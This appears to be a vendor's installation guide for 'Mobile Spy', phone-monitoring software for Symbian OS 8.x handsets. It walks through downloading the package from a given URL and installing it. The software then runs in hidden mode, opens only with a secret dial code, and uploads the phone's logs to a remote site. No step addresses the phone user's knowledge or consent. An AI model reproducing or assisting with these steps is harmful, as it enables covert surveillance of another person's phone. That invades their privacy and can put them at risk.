Installation Sub-Guide for Symbian OS 8.x Devices

You should create your username before completing the installation steps. For more information on creating your username, see the User Guide. After you have created your username, follow each section below to install to your Symbian OS 8.x smartphone.

Note: If your phone runs Symbian OS 9.x you should use the Symbian OS 9.x installation steps instead. The steps below are for Symbian OS 8.x only.

IMPORTANT NOTE: This version and these instructions are for Symbian OS 8.x ONLY!

1. Completely remove any previous version using the manual removal instructions. If you have never installed before, then go to step 2.

2. On your phone go to Menu > Web. This will launch the web browser on your phone.

3. Go to Options > Navigation Options > Go to web address.

4. Manually enter this address:
 http://www.mobile-spy.com/dls/MSpy_2nd.sis and then click "Goto". PLEASE NOTE: You must type the url exactly as shown above! Capitalization matters.


5. Wait until the program downloads and then click Install to install to the phone.

6. After installation is complete, reboot the phone by turning it off and then back on. This will load the software in hidden mode.

7. From your phone's Home screen, type these digits: *0123456789# and the interface will pop up.

8. You should now go to the Options screen and enter your username, password EXACTLY as you created them.

9. Select an Access Point. This is the Internet connection which allows the software to upload logs.

10. Click Hide. The software will tell you the phone needs to be rebooted. Select to reboot the phone.

You are now ready to monitor using Mobile Spy. To check logs, go to this specific login page to login: http://www.mobilespylogs.com.

You can bring up the interface to change settings by dialing *0123456789#
